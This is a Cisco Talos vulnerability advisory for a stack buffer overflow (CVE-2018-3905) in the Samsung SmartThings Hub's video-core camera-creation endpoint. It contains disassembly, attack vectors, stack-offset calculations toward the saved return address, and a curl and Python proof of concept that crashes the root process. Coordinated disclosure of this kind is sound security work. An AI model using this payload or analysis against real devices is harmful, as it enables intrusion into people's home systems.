Talos Vulnerability Report

TALOS-2018-0575

Samsung SmartThings Hub video-core Camera Creation Code Execution Vulnerability

July 26, 2018

CVE Number

CVE-2018-3905

Summary

An exploitable buffer overflow vulnerability exists in the camera "create" feature of video-core's HTTP server of Samsung SmartThings Hub. The video-core process incorrectly extracts the "state" field from a user-controlled JSON payload, leading to a buffer overflow on the stack. An attacker can send an HTTP request to trigger this vulnerability.

Tested Versions

Samsung SmartThings Hub STH-ETH-250 - Firmware version 0.20.17

Product URLs

https://www.smartthings.com/products/smartthings-hub

CVSSv3 Score

8.5 - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-120: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')

Details

Samsung produces a series of devices aimed at controlling and monitoring a home, such as wall switches, LED bulbs, thermostats and cameras. One of those is the Samsung SmartThings Hub, a central controller that allows an end user to use their smartphone to connect to their house remotely and operate other devices through it. The hub board uses several systems-on-chip (SoCs). The firmware in question is executed by an i.MX 6 SoloLite processor (Cortex-A9), which has an ARMv7-A architecture.

The firmware is Linux-based and runs a series of daemons that interface with nearby devices via Ethernet, ZigBee, Z-Wave and Bluetooth. Additionally, the hubCore process is responsible for communicating with the remote SmartThings servers via a persistent TLS connection. These servers act as a bridge that allows for secure communication between the smartphone application and the hub. End users can simply install the SmartThings mobile application on their smartphone to control the hub remotely.

One of the features of the hub is that it connects to smart cameras, configures them and views their livestreams. For testing, we set up the Samsung SmartCam SNH-V6414BN on the hub. Once the camera is set up, the smartphone application can display the livestream by connecting either to the remote SmartThings servers or directly to the camera, if the smartphone and the camera are in the same subnetwork.

Inside the hub, the livestream is handled by the video-core process, which uses ffmpeg to connect via RTSP to the smart camera on the same local network and, at the same time, provides a streamable link to the smartphone application.

The remote SmartThings servers can communicate with the video-core process by sending messages over the persistent TLS connection established by the hubCore process. These messages can encapsulate an HTTP request, which hubCore relays directly to the HTTP server exposed by video-core. The HTTP server listens on port 3000, bound to the localhost address, so a local connection is needed to perform this request.

We identified a vulnerable request that can be exploited to achieve code execution in the video-core process, which runs as root. By sending a POST request to the "/cameras" path, it's possible to add a new camera to the hub.

Such a request is handled by the function sub_48A14:

.text:00048A14     sub_48A14
.text:00048A14
.text:00048A14     dest   = -0x4364
.text:00048A14     var_4300= -0x4300
.text:00048A14     var_4200= -0x4200
.text:00048A14     var_4000= -0x4000
.text:00048A14     var_3E80= -0x3E80
.text:00048A14     var_3C80= -0x3C80
.text:00048A14     var_3A80= -0x3A80
.text:00048A14     var_2040= -0x2040
.text:00048A14     arg_0  =  4
.text:00048A14     buffer =  8
.text:00048A14     arg_8  =  0xC
.text:00048A14     arg_10 =  0x14
.text:00048A14
.text:00048A14 000        MOV             R12, #:lower16:dword_C4DCC
.text:00048A18 000        STMFD           SP!, {R4-R11,LR}
.text:00048A1C 024        MOVT            R12, #:upper16:dword_C4DCC
.text:00048A20 024        ADD             R11, SP, #0x20
.text:00048A24 024        SUB             SP, SP, #0x4300
.text:00048A28 4324       MOV             R5, R3
.text:00048A2C 4324       SUB             SP, SP, #0x54
...
.text:00048A8C 4378       BL              http_required_json_parameters  ; [1]
.text:00048A90 4378       MOV             R5, R0
.text:00048A94 4378       SUB             R0, R11, #-var_4000
.text:00048A98 4378       MOV             R1, R6
.text:00048A9C 4378       MOV             R2, #0x2044
.text:00048AA0 4378       SUB             R0, R0, #0xAC
.text:00048AA4 4378       BL              memset
.text:00048AA8 4378       SUB             R0, R11, #-var_4000
.text:00048AAC 4378       SUB             R0, R0, #0xAC
.text:00048AB0 4378       BL              clear_buffers
.text:00048AB4 4378       CMP             R5, R6
.text:00048AB8 4378       BNE             loc_48ADC
...
.text:00048ADC     loc_48ADC
.text:00048ADC 000        MOV             R0, R4
.text:00048AE0 000        BL              json_tokener_parse             ; [2]
.text:00048AE4 000        SUBS            R5, R0, #0
.text:00048AE8 000        BEQ             loc_48BEC
.text:00048AEC 000        SUB             R0, R11, #-var_4000
.text:00048AF0 000        MOV             R1, R5
.text:00048AF4 000        SUB             R0, R0, #0xAC
.text:00048AF8 000        BL              sub_48438                      ; [3]

Note that the binary embeds the "json-c" library that is used to manage JSON objects.

The function first calls http_required_json_parameters at [1] to verify that all the required parameters are specified in the JSON request. The required parameters are cameraId, locationId, dni and url. At [2], the function parses the JSON payload received in the request using json_tokener_parse, which returns a json_object. It then calls sub_48438 at [3], passing the pointer to a local stack buffer and the json_object as parameters.
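
The presence check at [1] can be pictured with a short Python sketch. This is an illustration only: `missing_required` is a hypothetical helper, not a reconstruction of http_required_json_parameters, and the only detail taken from this report is the list of required keys.

```python
import json

# Keys this report lists as required for the camera "create" request.
REQUIRED_KEYS = ("cameraId", "locationId", "dni", "url")


def missing_required(body: str) -> list:
    """Return the required keys that are absent from a JSON object body."""
    payload = json.loads(body)
    if not isinstance(payload, dict):
        # Not a JSON object at all, so every required key is missing.
        return list(REQUIRED_KEYS)
    return [key for key in REQUIRED_KEYS if key not in payload]
```

Calling `missing_required` on a body that carries all four keys returns an empty list. Note that "state" is not in the required list, so a request can pass a check of this kind with or without it.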

.text:00048438     sub_48438
.text:00048438
.text:00048438 000        STMFD           SP!, {R4-R9,LR}
.text:0004843C 01C        MOV             R4, R1
.text:00048440 01C        SUB             SP, SP, #0x244
.text:00048444 260        MOV             R1, #:lower16:aCameraid_1     ; "cameraId"
.text:00048448 260        MOV             R6, R0
.text:0004844C 260        ADD             R2, SP, #0x260+value
.text:00048450 260        MOV             R0, R4                        ; jso
.text:00048454 260        MOVT            R1, #:upper16:aCameraid_1     ; "cameraId"
.text:00048458 260        BL              json_object_object_get_ex     ; [4]
.text:0004845C 260        CMP             R0, #0
.text:00048460 260        BNE             loc_48488
...
.text:000485AC 260        MOV             R1, #:lower16:aLocationid_0   ; "locationId"
.text:000485B0 260        STR             R7, [R6,#4]
.text:000485B4 260        MOVT            R1, #:upper16:aLocationid_0   ; "locationId"
.text:000485B8 260        MOV             R0, R4                        ; jso
.text:000485BC 260        ADD             R2, SP, #0x260+value
.text:000485C0 260        BL              json_object_object_get_ex     ; [4]
.text:000485C4 260        CMP             R0, #0
.text:000485C8 260        BNE             loc_48638
...
.text:000486FC 260        MOV             R1, #:lower16:aDni            ; "dni"
.text:00048700 260        STR             R7, [R6,#0x208]
.text:00048704 260        MOVT            R1, #:upper16:aDni            ; "dni"
.text:00048708 260        MOV             R0, R4                        ; jso
.text:0004870C 260        ADD             R2, SP, #0x260+value
.text:00048710 260        BL              json_object_object_get_ex     ; [4]
.text:00048714 260        CMP             R0, #0
.text:00048718 260        BNE             loc_48790
...
.text:00048850 260        MOV             R1, #:lower16:aUrl_0          ; "url"
.text:00048854 260        STR             R7, [R6,#0x40C]
.text:00048858 260        MOVT            R1, #:upper16:aUrl_0          ; "url"
.text:0004885C 260        MOV             R0, R4                        ; jso
.text:00048860 260        ADD             R2, SP, #0x260+value
.text:00048864 260        BL              json_object_object_get_ex     ; [4]
.text:00048868 260        CMP             R0, #0
.text:0004886C 260        BNE             loc_488DC
...
.text:00048938 260        MOV             R1, #:lower16:aState          ; "state"
.text:0004893C 260        STR             R0, [R6,#0xE24]
.text:00048940 260        MOVT            R1, #:upper16:aState          ; "state"
.text:00048944 260        STRH            R3, [R12,#0xC]
.text:00048948 260        MOV             R0, R4                        ; jso
.text:0004894C 260        STRB            LR, [R6,#0xE2E]
.text:00048950 260        BL              json_object_object_get_ex     ; [4]
.text:00048954 260        CMP             R0, #0
.text:00048958 260        BNE             loc_489E0
...
.text:000489E0     loc_489E0
.text:000489E0 260        LDR             R0, [SP,#0x260+value]
.text:000489E4 260        BL              json_object_to_json_string    ; [5]
.text:000489E8 260        MOV             R7, R0
.text:000489EC 260        BL              strlen                        ; [6]
.text:000489F0 260        MOV             R4, R0
.text:000489F4 260        ADD             R0, R6, #0x810
.text:000489F8 260        MOV             R1, R7
.text:000489FC 260        MOV             R2, R4
.text:00048A00 260        ADD             R0, R0, #8
.text:00048A04 260        BL              memcpy                        ; [7]

The purpose of this function is to extract each parameter and store it in the buffer passed as an argument. Each parameter is extracted using the following sequence:

- Call to `json_object_object_get_ex` [4] and `json_object_to_json_string` [5] for extracting a parameter by key name.
- Copy the parameter value into a buffer on the stack, using `strlen` [6] and `memcpy` [7].
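
As a rough model of that sequence, the following Python sketch looks a key up, serializes the value, measures it and copies it into a fixed-size byte buffer. The name `extract_field` is hypothetical, and the sketch assumes that `json_object_to_json_string` returns the JSON serialization of the value, so a string value keeps its surrounding quotes.

```python
import json


def extract_field(jso: dict, key: str, dest: bytearray, offset: int) -> int:
    """Model one lookup-and-copy step; return the number of bytes copied.

    Returns 0 when the key is absent, mirroring the check on the return
    value of json_object_object_get_ex [4].
    """
    if key not in jso:                             # [4] lookup by key name
        return 0
    text = json.dumps(jso[key]).encode("ascii")    # [5] serialize the value
    length = len(text)                             # [6] strlen of the result
    # [7] memcpy. This model refuses to write out of bounds; the native
    # code performs the copy with whatever length it is given.
    if offset + length > len(dest):
        raise OverflowError("copy would run past the end of dest")
    dest[offset:offset + length] = text
    return length
```

For example, `extract_field({"state": "on"}, "state", bytearray(16), 4)` copies the four bytes `"on"` (quotes included) and returns 4.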

Additionally, before calling memcpy, the parameters "cameraId", "locationId" and "dni" are verified using regular expressions, and the "url" parameter is simply truncated to a maximum length of 0x200. However, the "state" parameter is not sanitized in any way. In fact, we can see that the length value for the memcpy call [7] is taken directly from the strlen [6] output of the source string itself. At a high level, this would be:

memcpy(stack_buffer, state, strlen(state));

Since "state" is controlled by the user and its length is never checked, the copy can overflow the stack buffer, potentially leading to arbitrary code execution.
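
To put rough numbers on this, the sketch below works out where the copy lands in the frame of sub_48A14, using only offsets visible in the listings above. It assumes that the elided instructions do not modify R11 or R6, and that R11 points at the saved LR (it is set to SP+0x20 right after nine registers are pushed). The constant and function names are illustrative, and the model ignores whatever locals sit between the buffer and the saved registers.

```python
# Offsets read from the disassembly; all names are illustrative.
SAVED_REGS = 9                    # STMFD SP!, {R4-R11,LR} pushes nine words
BUF_BELOW_R11 = 0x4000 + 0xAC     # buffer address = R11 - 0x4000 - 0xAC
BUF_SIZE = 0x2044                 # length passed to memset for that buffer
STATE_OFFSET = 0x810 + 8          # memcpy destination = R6 + 0x810 + 8

# Distance in bytes from the start of the "state" destination to:
to_end_of_buffer = BUF_SIZE - STATE_OFFSET        # end of the cleared region
to_saved_lr = BUF_BELOW_R11 - STATE_OFFSET        # saved LR (at R11)
to_saved_r4 = to_saved_lr - (SAVED_REGS - 1) * 4  # lowest saved register


def bytes_past_buffer(copy_len: int) -> int:
    """Bytes of a copy_len-byte copy that land beyond the cleared region."""
    return max(0, copy_len - to_end_of_buffer)
```

Under these assumptions, the copy would have to exceed 0x182C bytes to leave the region cleared by memset, and 0x3874 bytes to reach the saved registers. The size of the "state" field itself is not visible in the listing, so the sketch does not say at which length neighbouring fields of the same buffer start to be overwritten.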

We identified two different vectors that allow for exploiting this vulnerability:

  • Anyone able to impersonate the remote SmartThings servers can send arbitrary HTTP requests to hubCore that would be relayed without modification to the vulnerable video-core process.
  • SmartThings SmartApps allow for creating custom applications that can be either published directly into the device itself, or on the public marketplace. A SmartApp is executed inside the hubCore process, and is allowed to make any localhost connection. It is thus possible for a SmartApp to send arbitrary HTTP requests directly to the vulnerable video-core process.

A third vector might exist, but we decided not to test it to avoid damaging any live infrastructure. This would consist of sending a malicious request from the SmartThings mobile application to the remote SmartThings servers. In turn, depending on the remote APIs available, the servers could relay the malicious payload back to the device via the persistent TLS connection. To use this vector, an attacker would need a valid OAuth bearer token, or the corresponding username and password pair to obtain one.

Exploit Proof of Concept

The following proof of concept shows how to crash the video-core process:

$ curl -X POST "http://127.0.0.1:3000/cameras" -d '{"cameraId":"00000000-0000-0000-0000-000000000000","locationId":"00000000-0000-0000-0000-000000000000","dni":"000000000000","url":"x","state":"'$(perl -e 'print "A"x700')'"}'
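
The same request can be built programmatically. The Python sketch below only reproduces the curl command above using the standard library. `build_body` and `send` are hypothetical helper names, and `send` has to run from a context that can reach the localhost-bound port 3000 on the hub.

```python
import json
import urllib.request

TARGET = "http://127.0.0.1:3000/cameras"   # same URL as the curl command


def build_body(state_len: int = 700) -> bytes:
    """Build the JSON body of the proof of concept with a long "state"."""
    payload = {
        "cameraId": "00000000-0000-0000-0000-000000000000",
        "locationId": "00000000-0000-0000-0000-000000000000",
        "dni": "000000000000",
        "url": "x",
        "state": "A" * state_len,
    }
    # Compact separators give the same byte layout as the curl body.
    return json.dumps(payload, separators=(",", ":")).encode("ascii")


def send(body: bytes, url: str = TARGET) -> None:
    """POST the body; a crashing server may reset or drop the connection."""
    # Like curl -d, urllib defaults to a form-urlencoded Content-Type.
    request = urllib.request.Request(url, data=body, method="POST")
    try:
        urllib.request.urlopen(request, timeout=5).close()
    except OSError as exc:   # URLError and connection resets are OSErrors
        print("request did not complete:", exc)
```

Calling `send(build_body())` issues the request with the same 700-byte "state" value as the command above.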

Timeline

2018-04-16 - Vendor Disclosure
2018-05-23 - Discussion with vendor/review of timeline for disclosure
2018-07-17 - Vendor patched
2018-07-26 - Public Release

Credit

Discovered by Claudio Bozzato of Cisco Talos.